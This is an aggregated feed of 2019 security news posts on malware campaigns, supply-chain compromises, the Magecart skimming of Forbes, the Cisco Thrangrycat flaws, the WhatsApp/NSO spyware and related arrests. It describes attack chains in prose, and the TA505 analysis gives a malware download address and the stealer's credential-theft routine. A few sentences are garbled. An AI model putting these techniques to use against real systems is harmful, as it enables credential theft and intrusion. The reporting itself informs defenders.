The infected laptop is a creation of performance artist Guo O Dong in collaboration with cybersecurity company Deep Instinct. Curtis Silver, who has authored the Forbes report, has quoted Guo O Dong as telling him via email, “I created The Persistence of Chaos because I wanted to see how the world responds to and values the impact of malware.”

The six strains of malware that the laptop contains are

WannaCry – The ransomware that spread all across the world and made a devastating impact on over 200,000 computers across over 150 countries.

Mydoom – The fastest-spreading email worm till date, Mydoom was first seen in January 2004 and worked mainly by sending junk email through infected computers and at the same time appearing as a transmission error.

Sobig – First detected to be infecting computer systems in August 2003, this malware, which is a worm and a trojan, is the second fastest spreading worm as of 2018. It deactivated itself in September 2003.

BlackEnergy – The malware that was first seen in 2007 and then worked by generating bots for executing DDoS attacks that were distributed via email spam. At a later stage of evolution, it would drop an infected DLL component directly to the local application data folder.

ILOVEYOU – This malware, which spread through an email attachment ‘LOVE-LETTER-FOR-YOU.txt.vbs’, was sent from an infected person to people in his contact list. Once the attachment gets opened, a script is started that would overwrite random types of files- Office files, audio files, image files, etc. Seen since May 2000.

DarkTequila – This malware, which has been active since 2013 and seen impacting systems in Latin America, spreads through spear phishing and infected USB drives. Hackers use DarkTequila to steal corporate data, bank credentials, and personal data as well.

Curtis Silver observes in his Forbes report, “On a base level the goal if we believe light grey text on a white background, is to sell this malware infused laptop under the blanket of art for academic purposes. On a deeper level, it’s a statement of social anarchy, of controlled chaos and an exposé of how fragile our machine-connected lives really are.”

This is a very relevant observation because news relating to this laptop (if it has all the malware that it claims to have), is in all respects, a worrying thing.

Also, Read:

Wolters Kluwer Cloud Accounting & Tax System Down To Malware Attack

The Fileless Malware Attacks Are Here To Stay

Japanese Government to Deploy Defensive Malware

Kodi Hardware Add-on Users, Mostly At Risk With Malware

BabyShark Malware Targeting Nuclear and Cryptocurrency Industries

The post Laptop Running Six Most Dangerous Malware up for Auction appeared first on .

More Attacks against Computer Automatic Update Systems

Last month, Kaspersky discovered that Asus's live update system was infected with malware, an operation it called Operation Shadowhammer. Now we learn that six other companies were targeted in the same operation.

As we mentioned before, ASUS was not the only company used by the attackers. Studying this case, our experts found other samples that used similar algorithms. As in the ASUS case, the samples were using digitally signed binaries from three other Asian vendors:

  • Electronics Extreme, authors of the zombie survival game called Infestation: Survivor Stories,
  • Innovative Extremist, a company that provides Web and IT infrastructure services but also used to work in game development,
  • Zepetto, the South Korean company that developed the video game Point Blank.

According to our researchers, the attackers either had access to the source code of the victims' projects or they injected malware at the time of project compilation, meaning they were in the networks of those companies. And this reminds us of an attack that we reported on a year ago: the CCleaner incident.

Also, our experts identified three additional victims: another video gaming company, a conglomerate holding company and a pharmaceutical company, all in South Korea. For now we cannot share additional details about those victims, because we are in the process of notifying them about the attack.

Me on supply chain security.

A joint operation by international police dismantled GozNym gang

A joint effort by international law enforcement agencies from 6 different countries has dismantled the crime gang behind the GozNym banking malware.

GozNym banking malware is considered one of the most dangerous threats to the banking industry, experts estimated it allowed to steal nearly $100 million from over 41,000 victims across the globe for years.

“An unprecedented, international law enforcement operation has dismantled a complex, globally operating and organised cybercrime network.” reads the press release published by the Europol. “The criminal network used GozNym malware in an attempt to steal an estimated $100 million from more than 41 000 victims, primarily businesses and their financial institutions.”


The GozNym banking malware was first spotted in April 2015 by researchers from the  IBM X-Force Research, it combines the best features of Gozi ISFB and Nymaim malware.

The GozNym has been seen targeting banking institutions, credit unions, and retail banks. Among the victims of the GozNym Trojan there are 24 financial institutions in North America and organizations in Europe, including a Polish webmail service providers, investment banking and consumer accounts at 17 banks in Poland and one bank in Portugal.

Now the Europol announced the unprecedented, international law enforcement operation that allowed to dismantled the complex, globally operating and organised cybercrime network.

Europol with the help of law enforcement agencies from Bulgaria, Germany, Georgia, Moldova, Ukraine, and the United States identified and 0 individuals alleged members of the GozNym network.

5 defendants were arrested during several coordinated searches conducted in Bulgaria, Georgia, Moldova, and Ukraine, the remaining ones are Russians citizens and are still on the run, including the expert who developed the banking malware.

The cybercrime organization has been described by the Europol as a highly specialised and international criminal network.

One of the members that encrypted GozNym malware to avoid detection by security solutions, was arrested and is being prosecuted in the Republic of Moldova.

Operators behind the GozNym malware used the Avalanche network to spread the malware.

“Bulletproof hosting services were provided to the GozNym criminal network by an administrator of the “Avalanche” network.  The Avalanche network provided services to more than 200 cybercriminals, and hosted more than twenty different malware campaigns, including GozNym.” continues the press release published by Europol. Through the coordinated efforts being announced today, this alleged cybercriminal is now facing prosecution in Ukraine for his role in providing bulletproof hosting services to the GozNym criminal network.  The prosecution will be conducted by the Prosecutor General’s Office of Ukraine and the National Police of Ukraine.

The members of the gang used banking malware to infect victims’ computers and steal their online banking credentials.

“A criminal Indictment returned by a federal grand jury in Pittsburgh, USA charges ten members of the GozNym criminal network with conspiracy to commit the following:

  • infecting victims’ computers with GozNym malware designed to capture victims’ online banking login credentials;
  • using the captured login credentials to fraudulently gain unauthorised access to victims’ online bank accounts;
  • stealing money from victims’ bank accounts and laundering those funds using U.S. and foreign beneficiary bank accounts controlled by the defendants.

The defendants are well known on Russian underground, they advertised their specialized technical skills and services in Russian-speaking online criminal forums. Through these forums the leader of the GozNym network recruited them.

“The leader of the GozNym criminal network, along with his technical assistant, are being prosecuted in Georgia by the Prosecutor’s Office of Georgia and the Ministry of Internal Affairs of Georgia.” continues the Europol.

Below the advisory published by the FBI:


Pierluigi Paganini

(SecurityAffairs – GozNym, malware)

The post A joint operation by international police dismantled GozNym gang appeared first on Security Affairs.

Forbes subscribers warned of Magecart threat skimming credit card details

The notorious Magecart malware, that blights online stores by stealing payment card details from unsuspecting shoppers at checkout, has claimed another high profile victim. Security researcher Troy Mursch raised the alarm on Twitter that the Forbes magazine subscription website had been compromised with malicious code that was siphoning off sensitive credit card information as users […]… Read More

The post Forbes subscribers warned of Magecart threat skimming credit card details appeared first on The State of Security.

The stealthy email stealer in the TA505 hacker group’s arsenal

Experts at Yoroi-Cybaze Z-Lab observed a spike in attacks against the banking sector and spotted a new email stealer used by the TA505 hacker group


During the last month, our Threat Intelligence surveillance team spotted increasing evidence of an operation intensification against the Banking sector. In fact, many independent researchers pointed to a particular email attack wave probably related to the known TA505 hacking group, active since 2014 and focusing on Retail and Banking companies. The group is also known for some evasive techniques they put in place over time to avoid the security controls and penetrate corporate perimeters with several kinds of malware, for instance abusing the so-called LOLBins (Living Off The Land Binaries), legit programs regularly used by victim, or also the abuse of valid cryptographically signed payloads.

Figure 1. Attack campaign spotted in the wild.

Investigating and tracking their operations during April and May we detected an interesting tool was delivered through the victim machine. Just after the opening of malicious documents and the installation of FlawedAmmy RAT implants, the group used to deploy a particular credential stealing software, part of their arsenal, revealing details of their recent operation.

Figure 2. Attack campaign spotted in the wild.

Technical Analysis

The piece of malware under analysis were downloaded from “bullettruth[.com/out[.exe”, it was executed into the victim machines after the establishment of the infection.

ThreatCustom Email Stealer
Brief DescriptionExecutable of the email stealer
Figure 3: Malware Signature by SLON LTD

Firstly, we noticed this secondary component was well protected against antivirus detection, in fact, the PE file was signed by Sectigo in the first half of May, one of the major Russian Certification Authority. Analyzing the trust chain we found the attackers were relying on cryptographic keys released to a UK company named  SLON LTD. At this time, we have no evidence to hypothesize it could be a victim of previous hacks or not.

Anyway, a static inspection of the binary revealed that the malware has a quite high entropy level, suggesting it may be packed.

Figure 4: Malware suspicious entropy level

Dynamically executing the malware, more information about its behaviour is revealed. The malicious executable is substantially an email stealer, in fact, the only purpose is to retrieve all the emails and passwords accounts present inside the victim machine. After executing the information gathering routine, the malware sends to its C2 all the retrieved emails and passwords:

Figure 5: HTTP POST communication

The interesting thing about the communication with the C2 is the fact that there is no encryption: the data harvested are sent to the C2 in JSON format. Investigating the attacker infrastructure we noticed interesting information such as the information of the stolen emails through our Digital Surveillance systems.

In order to retrieve more details about this Email Stealer, the analysis has moved into debugging and disassembling. As previously mentioned, the malware sample is heavily obfuscated and packed. However, by letting the malware execute itself within a debugger, we were able to extract the unpacked payload of the malware.

Figure 6: Static information about the packed sample (on the left) and the unpacked one (on the right)

As shown by the above figure, we notice a peculiarity of these two components: while the packed sample is compiled in Microsoft Visual C++ version 6.0, the unpacked one is compiled in Microsoft Visual C++ version 8. At this point, we deepen the analysis on the extracted payload. However, we are not able to execute it, because it always references many memory addresses of the original one. So, we carry on static analysis on the extracted sample.

As previously described, the malware’s principal purpose is to iterate through the filesystem looking for email accounts.. The first step is to check whether the “outlook.exe” process is running and, in this case it kills the process.The malware iterate through user processes with Process32FirstW API and then kill it with TerminateProcess:

Figure 7: Outlook process search routine

The extracted payload does not present any type of code obfuscation of other types. In fact the C2 server and the path is not encoded:

Figure 8: C2 connection routine

The last routine being analyzed is the credential harvesting inside the entire filesystem.

Apart from the routine that searches for the email account registered in Outlook and Thunderbird clients (as shown in Figure 7), there is another one which scans the filesystem looking for hardcoded extensions, then, if one of them is found, a reference to the found file is conserved inside the %TEMP% directory. At this point, all the gathered email accounts are sent to the server and then erasing  all traces of itself from the infected machine, in fact, the malware creates a simple batch script which delete itself and all the tracks of infection.

Figure 9: Autodeletion batch script

Analysis of Exposed Emails

In this paragraph are shown some statistics about the harvested emails in the attack campaign, recovered during surveillance and hunting operations. So we decided to create a graph in which sort the most frequent TLD occurrences of all the stolen data.

Figure 10: Distribution of TLD

As seen in the graph above, the most frequent TLD is .com with 193.194 occurrences, following .kr with 102.025 occurrences, .cn with 26.160 occurrences, it with 6.317 occurrences and so on. To better visualize the macro-locations involved in this exposure we built a heatmap showing the geographical distribution of the TOP 100 countries referenced in the TLDs.

Figure 11: Geolocation of emails TLD exposure

The heatmap shows the less-affected countries with a greenish color, on the contrary, the most-affected ones tend to an orange or red-tinged color. The first thing that emerges from these 2 distributions is that this specific threat seems not to be targeted, in fact, the diffusion is almost global with some red or orange zones in UK, Italy, Republic of Korea, China, Germany, Hungary, Taiwan, Japan, India and Mexico. All these countries exceeded the thousand occurrences.


Nowadays, the email accounts are an effective source of revenue for the cyber criminals. In fact all these information can be used to spread other malware through phishing campaigns, to perform BEC attacks (Business Email Compromise) and also to try credential stuffing attacks.

Evan a simple Info-Stealer malware like this one could be a dangerous threat, especially if used by organized groups in conjunction with other malware implants. In fact, as reported by the independent researcher Germán Fernández Bacian too, this Email Stealer has been recently used by the infamous TA505 hacking group. This link means, with good confidence, the exposed data, full email accounts in some cases and email contacts in general, are now available to a cyber-criminal group who launched targeted attacks against Banks and Retail industries in the near past.

Technical details, including IoCs and Yara Rules, are available in the analysis published on the Yoroi blog.

[adrotate banner=”9″][adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – TS505, malware)

The post The stealthy email stealer in the TA505 hacker group’s arsenal appeared first on Security Affairs.

Magecart hackers inject card Skimmer in Forbes Subscription Site

The Magecart gang made the headlines again, the hackers this time compromised the Forbes magazine subscription website.

The Magecart group is back, the hackers this time compromised injected a skimmers script into the Forbes magazine subscription website.

The malicious traffic was spotted by the security expert Troy Mursch
Chief Research Officer of Bad Packets, on Wednesday.

Magecart forbes magazine

Magecart hackers have installed malicious JavaScript skimmer on to siphon payment card data entered into the site by subscribers. Crooks injected an obfuscated JavaScript in the HTML code of the payment section, the script decoded is here.

The expert immediately attempted to report his discovery to Forbes via email, but without success.

The payment page was taken down at around 1400 UTC and it is still offline at the time of writing.

A Forbes spokesperson told El Reg that is investigating the incident and that at this stage, it is not aware of the theft of any customers’ credit card information. Recent subscribers should remain vigilant and check their credit card statements for signs of fraudulent activities.

Forbes was likely a victim of a supply chain attack, Magecart hackers have compromised a company that provides services to the media outlet.

During the weekend, the forensic expert Willem de Groot discovered that the records of customers of Picreel, a web marketing software supplier, had been leaked online.

Forbes is one of the customers of Picreel, and Magecart hackers used the leaked data to access Forbes infrastructure and install the skimmer script.

“Last weekend, security researchers surfaced new supply-chain attacks involving Magecart web-skimmers placed on several web-based suppliers, including AdMaxim, CloudCMS, and Picreel. The breaches were part of a large-scale attack that hit a breadth of providers simultaneously intending to access as many websites as possible.” reads the analysis published RiskIQ.

Thousands of other companies that are customers at Picreel are at risk, potentially affected domains are listed here.

Security firms have monitored the activities of a dozen Magecart groups at least since 2015. The gangs use to implant skimming script into compromised online stores in order to steal payment card data, but they are quite different from each other.

According to a joint report published by RiskIQ and FlashPoint in March, some groups are more advanced than others. The list of victims of Magecart groups is long and includes several major platforms such as British AirwaysNeweggTicketmaster, and Feedify​​

Recently the Magecart group stole payment card details from the e-commerce system used by colleges and universities in Canada and the US.

Pierluigi Paganini

(SecurityAffairs – Magecart, Forbes)

The post Magecart hackers inject card Skimmer in Forbes Subscription Site appeared first on Security Affairs.

BlackTech espionage group exploited ASUS update process to deliver Plead Backdoor

The BlackTech cyber-espionage group exploited the ASUS update process for WebStorage application to deliver the Plead backdoor.

The cyber espionage group tracked as BlackTech compromised the ASUS update process for WebStorage application to deliver the Plead backdoor.

The BlackTech group was first observed by ESET on July 2018, when it was abusing code-signing certificates stolen from D-Link for the distribution of the Plead backdoor that has been in the wild since at least 2012.

According to the experts, the cyber espionage group is highly skilled and most of its victims are in the East Asia region, particularly Taiwan.

At the end of April 2019, experts from ESET observed observed multiple attempts to deploy the Plead backdoor. In the attacks observed by the researhcers, the Plead backdoor was created and executed by a legitimate process named AsusWSPanel.exe that is associated with the Windows client for a cloud storage service called ASUS WebStorage. The executable file used in the attack is digitally signed by ASUS Cloud Corporation.

Experts noticed that all observed samples of the Plead backdoor had the file name ‘Asus Webstorage Upate.exe.’ Experts discovered that
during the software update process, the AsusWSPanel.exe module of ASUS WebStorage can create files with such filenames.

Threat actors might have had access to the update mechanism a circumstance that suggest two attack scenarios:

  • Hackers hack compromise the supply chain for the ASUS WebStorage cloud service;
  • Hackers were in the position to carry out a MITM attack, given that WebStorage binaries are delivered via HTTP during the update process. 

Experts believe that the second scenario is more plausible updates for the
ASUS WebStorage software are not provided through a secure connection and the process lack of validation for the binaries downloaded.

“The ASUS WebStorage software is vulnerable to a man-in-the-middle attack (MitM).” reads the advisory published by ESET. “Namely, the software update is requested and transferred using HTTP; once an update is downloaded and ready to execute, the software doesn’t validate its authenticity before execution. Thus, if the update process is intercepted by attackers, they are able to push a malicious update.”

Experts from ESET noticed that most of the affected organizations have routers made by the same vendor and their admin panels are exposed online. It is likely that attackers compromised the routers to carry out a MitM attack.

Plead backdoor

During the update mechanism for ASUS WebStorage, the client sent a request to the server to request the update, in turn the server responds in XML format, with a guid and a link included in the response. The software then checks if the installed version is older, based on the information in the guid element, and requests the update binary via the provided link. 

“Therefore, attackers could trigger the update by replacing these two elements using their own data. This is the exact scenario we actually observed in the wild. attackers inserted a new URL, which points to a malicious file at a compromised domain,” says ESET. 

The attackers serve a Plead sample that acts as a first-stage downloader that fetches a fav.ico file from a server, whose name mimics the official ASUS WebStorage server. The downloaded file contains a PNG image and data used by the malware, which is located right after PNG data

The second-stage loader writes itself to the Start Menu startup folder to gains persistence. The loader executes shellcode in memory to load the third-stage DLL, the TSCookie.

“We see that supply-chain and man-in-the-middle attacks are used more and more often by various attackers all around the globe.” ESET concludes.  “This is why it’s very important for software developers not only to thoroughly monitor their environment for possible intrusions, but also to implement proper update mechanisms in their products that are resistant to MitM attacks,”

Pierluigi Paganini

(SecurityAffairs – Plead Backdoor, Zero-day, BlackTech group)

The post BlackTech espionage group exploited ASUS update process to deliver Plead Backdoor appeared first on Security Affairs.

The Latest Techniques Hackers are Using to Compromise Office 365

It was only a few years back that cloud technology was in its infancy and used only by tech-savvy, forward-thinking organisations. Today, it is commonplace. More businesses than ever are making use of cloud services in one form another. And recent statistics suggest that cloud adoption has reached 88 percent. It seems that businesses now […]… Read More

The post The Latest Techniques Hackers are Using to Compromise Office 365 appeared first on The State of Security.

3 Tips for Protecting Against the New WhatsApp Bug

Messaging apps are a common form of digital communication these days, with Facebook’s WhatsApp being one of the most popular options out there. The communication platform boasts over 1.5 billion users – who now need to immediately update the app due to a new security threat. In fact, WhatsApp just announced a recently discovered security vulnerability that exposes both iOS and Android devices to malicious spyware.

So, how does this cyberthreat work, exactly? Leveraging the new WhatsApp bug, cybercriminals first begin the scheme by calling an innocent user via the app. Regardless of whether the user picks up or not, the attacker can use that phone call to infect the device with malicious spyware. From there, crooks can snoop around the user’s device, likely without the victim’s knowledge.

Fortunately, WhatsApp has already issued a patch that solves for the problem – which means users will fix the bug if they update their app immediately. But that doesn’t mean users shouldn’t still keep security top of mind now and in the future when it comes to messaging apps and the crucial data they contain. With that said, here are a few security steps to follow:

  • Flip on automatic updates. No matter the type of application or platform, it’s always crucial to keep your software up-to-date, as fixes for vulnerabilities are usually included in each new version. Turning on automatic updates will ensure that you are always equipped with the latest security patches.
  • Be selective about what information you share. When chatting with fellow users on WhatsApp and other messaging platforms, it’s important you’re always careful of sharing personal data. Never exchange financial information or crucial personal details over the app, as they can possibly be stolen in the chance your device does become compromised with spyware or other malware.
  • Protect your mobile phones from spyware. To help prevent your device from becoming compromised by malicious software, such as this WhatsApp spyware, be sure to add an extra layer of security to it by leveraging a mobile security solution. With McAfee Mobile Security being available for both iOS and Android, devices of all types will remain protected from cyberthreats.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post 3 Tips for Protecting Against the New WhatsApp Bug appeared first on McAfee Blogs.

The Guardian view on hacking: a dangerous arms trade | Editorial

Cyberweapons are dangerous in themselves. Their proliferation makes them much more harmful

NSO Group, an Israeli firm that has risen to a billion-dollar valuation on the strength of the aggressive hacking tools it sells to authoritarian governments across the Arab world, is being sued by lawyers and activists who claim to be victims of its software. One of the lawyers involved in the suit was targeted some weeks ago by mysterious WhatsApp calls to his phone in the middle of the night. When he contacted technical experts, they discovered Pegasus 3, an aggressive virus that can apparently install itself on a phone without the victim taking any action at all. Once installed, it takes control of the device, recording conversations and video. It can destroy the evidence of its own arrival and existence, and control any files on the device. In effect, it turns a smartphone into the perfect spying device, which the victim will carry everywhere with them.

Similar programs are widely available to abusers of all sorts, which is one reason why many domestic violence shelters ban the use of smartphones. But the ones that can easily be bought require some action from the victim, usually a misplaced click, or else a few moments’ access to their phone. The NSO malware targeting WhatsApp is different in that it could install itself without the victim doing anything at all. To discover and exploit the programming mistakes that opened this vulnerability would take years and cost millions of dollars. That is why it’s assumed that only states, or state-backed actors, have the resources to produce them.

Continue reading...

Thrangrycat flaw could allow compromising millions of Cisco devices

Security firm Red Balloon discovered a severe vulnerability dubbed Thrangrycat, in Cisco products that could be exploited to an implant persistent backdoor in many devices.

Experts at Red Balloon Security disclosed two vulnerabilities in Cisco products. The first issue dubbed Thrangrycat, and tracked as CVE-2019-1649, affects multiple Cisco products that support Trust Anchor module (TAm).

could be exploited by an attacker to fully bypass Cisco’s Trust Anchor module (TAm) via Field Programmable Gate Array (FPGA) bitstream manipulation. The second vulnerability, tracked as
CVE-2019-1862, is a remote command injection issue that affects Cisco IOS XE version 16 and that could allow remote attackers to execute code as root.

By chaining the flaws an attacker can remotely and persistently bypass Cisco’s secure boot mechanism and lock out all future software updates to the TAm.

A vulnerability in the logic that handles access control to one of the hardware components in Cisco’s proprietary Secure Boot implementation could allow an authenticated, local attacker to write a modified firmware image to the component.” reads the advisory published by Cisco. “This vulnerability affects multiple Cisco products that support hardware-based Secure Boot functionality. “

The Trust Anchor module (TAm) is a hardware-based component the allows to check that Cisco hardware is authentic and also implements additional security services.

Cisco Secure Boot helps ensure that the code running on Cisco hardware platforms is authentic and unmodified, it is available in Cisco devices since 2013.

The researchers discovered that an attacker with root privileges can make a persistent modification to the Trust Anchor module via FPGA bitstream modification and load a malicious bootloader.

“An attacker with root privileges on the device can modify the contents of the FPGA anchor bitstream, which is stored unprotected in flash memory.” reads the analysis published by the experts.

“Elements of this bitstream can be modified to disable critical functionality in the TAm. Successful modification of the bitstream is persistent, and the Trust Anchor will be disabled in subsequent boot sequences. It is also possible to lock out any software updates to the TAm’s bitstream.”

Thrangrycat flaw Cisco devices

Cisco classified the flaw as high severity, it received a CVSS Score Base 6.7 because the exploitation of the flaw requires root privileges. Anyway, Red Balloon pointed out that attackers could also exploit the Thrangrycat vulnerability remotely by chaining it together with other vulnerabilities that could allow them to gain root access or, at least, execute commands as root.

“An attacker with elevated privileges and access to the underlying operating system that is running on the affected device could exploit this vulnerability by writing a modified firmware image to the FPGA.” continues the advisory published by Cisco. “A successful exploit could either cause the device to become unusable (and require a hardware replacement) or allow tampering with the Secure Boot verification process, which under some circumstances may allow the attacker to install and boot a malicious software image. “

Summarizing, the attackers first exploit the RCE vulnerability (CVE-2019-1862) in the web-based user interface of Cisco’s IOS that allows a logged-in administrator to remotely execute arbitrary commands on the underlying Linux shell with root privileges.

Then, once gained root access, the attacker can remotely bypass Trust Anchor module (TAm) on a targeted device triggering the Thrangrycat vulnerability and install a malicious backdoor.

The flaws are very concerning because they reside in the hardware and cannot be addressed with a software patch.

“Since the flaws reside within the hardware design, it is unlikely that any software security patch will fully resolve the fundamental security vulnerability.” concludes the advisory published by Red Balloon.

The experts successfully tested the flaw against Cisco ASR 1001-X routers, but hundreds of millions of Cisco units featuring an FPGA-based TAm implementation are vulnerable.

Red Balloon experts reported the flaws to Cisco in November 2018 and publicly disclosed some details to the public after Cisco released firmware patches to address the vulnerabilities.

The good news is that Cisco in not aware of attacks in the wild exploiting the two vulnerabilities.

Pierluigi Paganini

(SecurityAffairs – Thrangrycat, Cisco)

The post Thrangrycat flaw could allow compromising millions of Cisco devices appeared first on Security Affairs.

North Korea-linked ScarCruft APT adds Bluetooth Harvester to its arsenal

The North Korea-linked APT group ScarCruft (aka APT37 and Group123) continues to expand its arsenal by adding a Bluetooth Harvester.

North Korea-linked APT group ScarCruft (aka APT37, Reaper, and Group123) continues to expand its arsenal by adding a Bluetooth Harvester.

ScarCruft has been active since at least 2012, it made the headlines in early February 2018 when researchers revealed that the APT group leveraged a zero-day vulnerability in Adobe Flash Player to deliver malware to South Korean users.

Kaspersky first documented the operations of the group in 2016. Cyber attacks conducted by the APT37 group mainly targeted government, defense, military, and media organizations in South Korea.

FireEye linked the APT37 group to the North Korean government based on the following clues:

  • the use of a North Korean IP;
  • malware compilation timestamps consistent with a developer operating in the North Korea time
    zone (UTC +8:30) and follows what is believed to be a typical North Korean workday;
  • objectives that align with Pyongyang’s interests(i.e. organizations and individuals involved in Korean
    Peninsula reunification efforts);

Researchers from FireEye revealed that the nation-state actor also targeted entities in Japan, Vietnam, and even the Middle East in 2017. The hackers targeted organizations in the chemicals, manufacturing, electronics, aerospace, healthcare, and automotive sectors.

Past attacks associated with the ScarCruft APT group involved zero-day vulnerabilities, anyway Kaspersky researchers pointed out that threat actors also used public exploits in its campaigns.

On April 2018, ScarCruft APT added a more advanced variant of an Android Trojan, dubbed KevDroid, to its arsenal.

Now Kaspersky Lab experts discovered that ScarCruft is using a “rare” Bluetooth device harvester.

Kaspersky found several victims of a recent campaign in investment and trading companies in Vietnam and Russia.

“We believe they may have some links to North Korea, which may explain why ScarCruft decided to closely monitor them. ScarCruft also attacked a diplomatic agency in Hong Kong, and another diplomatic agency in North Korea.” reads the analysis published by Kaspersky Lab. “It appears ScarCruft is primarily targeting intelligence for political and diplomatic purposes.”

scarcruft bluetooth harvester 2

“The ScarCruft group keeps expanding its exfiltration targets to steal further information from infected hosts and continues to create tools for additional data exfiltration.” continues the analysis.

“We also discovered an interesting piece of rare malware created by this threat actor – a Bluetooth device harvester. This malware is responsible for stealing Bluetooth device information.”

The Bluetooth Harvester is delivered by a downloader, it leverages the Windows Bluetooth APIs to collect information on the devices connected via Bluetooth to the compromised system.

The tool gathers several data including device name, address, class, and whether the device is connected, authenticated and remembered.

The dropper used to deliver the Bluetooth Harvester exploits a privilege escalation (CVE-2018-8120) or leverage the UACME method to bypass the Windows User Account Control (UAC) feature. Then the malware executes an installer that creates another downloader that retrieves a final payload hidden inside an image file.

“The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload. In order to evade network level detection, the downloader uses steganography. The downloaded payload is an image file, but it contains an appended malicious payload to be decrypted.” continues Kaspersky.

scarcruft bluetooth harvester

The final payload was a backdoor tracked by Cisco as ROKRAT that is used to download and execute other malware, execute commands, and exfiltrate data.

Kaspersky experts also discovered some overlaps with other APT groups, DarkHotel and KONNI. One of the devices infected with ScarCruft malware was previously compromised by a variant of KONNI and a few days earlier by the GreezeBackdoor, a malware belonging to DarkHotel’s arsenal.

“The ScarCruft has shown itself to be a highly-skilled and active group. It has a keen interest in North Korean affairs, attacking those in the business sector who may have any connection to North Korea, as well as diplomatic agencies around the globe.” concludes Kaspersky. “Based on the ScarCruft’s recent activities, we strongly believe that this group is likely to continue to evolve.”

Pierluigi Paganini

(SecurityAffairs – ScarCruft, Bluetooth Harvester)

The post North Korea-linked ScarCruft APT adds Bluetooth Harvester to its arsenal appeared first on Security Affairs.

WhatsApp spyware attack was attempt to hack human rights data, says lawyer

NSO Group technology reportedly used against lawyer involved in civil case against the Israeli surveillance firm

The UK lawyer whose phone was targeted by spyware that exploits a WhatsApp vulnerability said it appeared to be a desperate attempt by someone to covertly find out the details of his human rights work.

The lawyer, who asked not to be named, is involved in a civil case brought against the Israeli surveillance company NSO Group whose sophisticated Pegasus malware has reportedly been used against Mexican journalists, and a prominent Saudi dissident living in Canada.

Related: WhatsApp urges users to update app after discovering spyware vulnerability

Users are strongly advised to check for WhatsApp updates manually through the Apple App Store on an iPhone, Google Play or similar on an Android device, the Microsoft Store on Windows Phones and the Galaxy app store on Tizen devices.

Related: Mexico accused of spying on journalists and activists using cellphone malware

Continue reading...

Malware Training Sets: FollowUP

The popular expert Marco Ramilli provided a follow up to its Malware classification activity by adding a scripting section which would be useful for several purposes.

On 2016 I was working hard to find a way to classify Malware families through artificial intelligence (machine learning). One of the first difficulties I met was on finding classified testing set in order to run new algorithms and to test specified features. So, I came up with this blog post and this GitHub repository where I proposed a new testing-set based on a modified version of Malware Instruction Set for Behavior-Based Analysis, also referred as MIST. Since that day I received hundreds of emails from students, researchers and practitioners all around the world asking me questions about how to follow up that research and how to contribute to expanding the training set.


I am so glad that many international researches used my classified Malware dataset as building block for making great analyses and for improving the state of the art on Malware research. Some of them are listed here, but many others papers, articles and researches have been released (just ask to Google).

Today I finally had chance to follow-it-up by adding a scripting section which would be useful to: (i) generate the modified version of MIST files (the one in training sets) and to (ii) convert the obtained results to ARFF (Attribute Relation File Format) by University of Waikato. The first script named is a reporting module that could be integrated into a running CuckooSandBox environment. It is able to take the cuckoo report and convert it into a modified version of MIST file. To do that, drop into your running instance of CuckooSandbox V1 (modules/reporting/) and add the specific configuration section into conf/reporting.conf. You might decide to force its execution without configuration by editing directly the source code. The result would be a MIST file for each Cuckoo analysed sample. The MIST file wraps out the generated features as described into the original post here. By using the second script named you can convert your JSON object into ARFF which would be very useful to be imported into WEKA for testing your favorite algorithms.

Now, if you wish you are able to generate training sets by yourself and to test new algorithms directly into WEKA. The creation process follows those steps:

  • Upload the samples into a running CuckooSanbox patched with
  • The produces a MIST.json file for each submitted sample
  • Use a simple script to import your desired MIST.json files into a MongoDB. For example for i in */.json; do; mongoimport –db test –collection test –file $i; done;
  • Use the to generate ARFF
  • Import the generated ARFF into Weka
  • Start your experimental sessions

If you want to share with the community your new MIST classified files please feel free to make pull requests directly on GitHubEverybody is using this set will appreciate it.

The original post along many other interesting analysis are available on the Marco Ramilli blog:

About the author: Marco Ramilli, Founder of Yoroi

This image has an empty alt attribute; its file name is ramilli.jpeg

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

This image has an empty alt attribute; its file name is yoroi.png

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence center I’ve ever experienced! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Pierluigi Paganini

(SecurityAffairs – malware, artificial intelligence)

The post Malware Training Sets: FollowUP appeared first on Security Affairs.

WhatsApp urges users to update app after discovering spyware vulnerability

The spyware, developed by Israeli cyber intelligence company, used infected phone calls to take over the functions of operating systems

WhatsApp is encouraging users to update to the latest version of the app after discovering a vulnerability that allowed spyware to be injected into a user’s phone through the app’s phone call function.

The spyware was developed by the Israeli cyber intelligence company NSO Group, according to the Financial Times, which first reported the vulnerability.

Related: WhatsApp 'deleting 2m accounts a month' to stop fake news

Users are strongly advised to check for WhatsApp updates manually through the Apple App Store on an iPhone, Google Play or similar on an Android device, the Microsoft Store on Windows Phones and the Galaxy app store on Tizen devices.

Continue reading...

Global Information Services Company Discloses Malware Attack

A global information services company has disclosed a malware attack that affected several of its applications and platforms. On 6 May, global solutions provider Wolters Kluwer published a statement in which it confirmed that it was suffering network issues: We are experiencing network and service interruptions affecting certain Wolters Kluwer platforms and applications. Out of […]… Read More

The post Global Information Services Company Discloses Malware Attack appeared first on The State of Security.

2019 Verizon Data Breach Investigations Report (DBIR) Key Takeaways

The 2019 Verizon Data Breach Investigations Report (DBIR) was released today, and I was lucky enough to be handed a hot off the press physical copy while at the Global Cyber Alliance Cyber Trends 2019 event at Mansion House, London. For me, the DBIR provides the most insightful view on the evolving threat landscape, and is the most valuable annual “state of the nation” report in the security industry.

Global Cyber Alliance Cyber Trends 2019

